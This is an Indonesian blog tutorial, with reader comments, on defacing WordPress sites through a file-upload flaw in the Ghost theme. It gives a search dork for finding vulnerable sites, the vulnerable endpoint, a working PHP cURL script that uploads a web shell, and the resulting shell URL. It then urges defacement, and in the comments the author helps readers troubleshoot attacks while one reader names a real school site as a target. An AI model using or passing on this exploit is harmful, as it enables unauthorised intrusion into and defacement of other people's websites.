Hallo fans .-. Nuenomaru disini.
diPostingan sebelumnya Nue share Deface Website Phising dengan Hidden Uploader.
Sekarang Nue akan Share Tutorial Deface dengan Exploit WordPress Ghost Theme File Upload *ini exploit lama sih wkwkw
exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*
bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) - PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
Lanjotz
Edited By: OepilCore |
pertama buka xamppnya dlu, pastikan tanda ; pada curl di php.ini sudah di hapus.
Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini
Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )
Dork: inurl:wp-content/themes/Ghost/
(kembangin lg, gunakan imajinasi bokever agan, biar dpt yg vuln and verawan)
1. Dorking di search Engine
exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
3. Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}
Vuln boss
4. Buat File Baru Berekstensi .php Contoh ghost.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ghost.php tadi
<?php
$uploadfile="namashell.php";
$ch = curl_init("target.co.li/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
7. jika sukses , akan muncul nama shell sobat di CMD,dan akan keluar lengkap link akses shell ente
8. Shell Akses:
www.target.co.li/wp-content/uploads/settingsimages/namashell.php
Done~ ..
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
cuma nitip file Umz :'(
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: 0day
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: 0day
foto hanya pemanis di thread :'v |
Visit and follow :
21 comments
di tunggu tutorial selanjut nya mastah _/|\_
haha terimakasih telah membaca artikel diblog kami. masalah mastah :o , kamu lbh mastah dari pada kami bang :D
ouh iya baca juga artikel trbaru diblog ini, yg dipost oleh uyulcrack: http://tkjcyberart.blogspot.co.id/2016/06/warehouse-responsive-prestashop-16.html
terus stay dimarii yoo.. makasihh bang.
#Nuenomaru
that upload script is crap. Can't upload shit with it, don't know why. I was finalyyyyyyy able to get it uploaded using a different upload script. Fun stuff
Kalo di android bisa gk bang?
bisa kok bang, abang bikin script uploadifynya aja yg HTML atau buat auto exploitnya sisipin ke site yg abang pernah dipes :D
#Nuenomaru
Gan Pas Visit url shell koq error 500 internal server
hehehe utk exploit ini ane bloman tau cara nanggulangi 500 internal server :D , jdi cari target laen saja ya mz
#Nuenomaru
gan pas visit url shell koq error 500 internal server sih ?
xixixhi,, ganti target ajah dlu gan :v
#Nuenomaru
Bang kalo website kayak gini bisa gak?
http://www.smpn3tasikmalaya.sch.id
Itu sebenernya wordpres saya coba dari conto orang lain gak bisa gagal mulu
walaupun CMS Nya sama2 wordpress, belum tentu Bug nya sama om :D
silahkan explore lbh daalam
#Nuenomaru
Bang di cmd'nya kok tetulis {"status":"NOK", "ERR":"This file is incorrect"} .. itu maksudnya apa ya ?
silahkan cari target laen om
#Nuenomaru
misi bang, tanda ; curl di php.ini kan ada 3,itu yg mana? di hapus semua atau cuma di bagian curl.cainfo= ?
akwkakawk,, >..<"
coba baca google yaw, baca pelan2
#Nuenomaru
hehe maklum bang ane kgk bisa maen ginian,kalo waktu akses shell nya blank gimana bang ?
coba bypass ekstensinye dl deh
#Nuenomaru
Jd intinya itu tebak2an password yg kita bikin sendiri ya?
tebak2an biji mane ?
#Nuenomaru
Gan Cara Hapus ; INI gimana ya Ane Masih bingung ??? Fast Respone
EmoticonEmoticon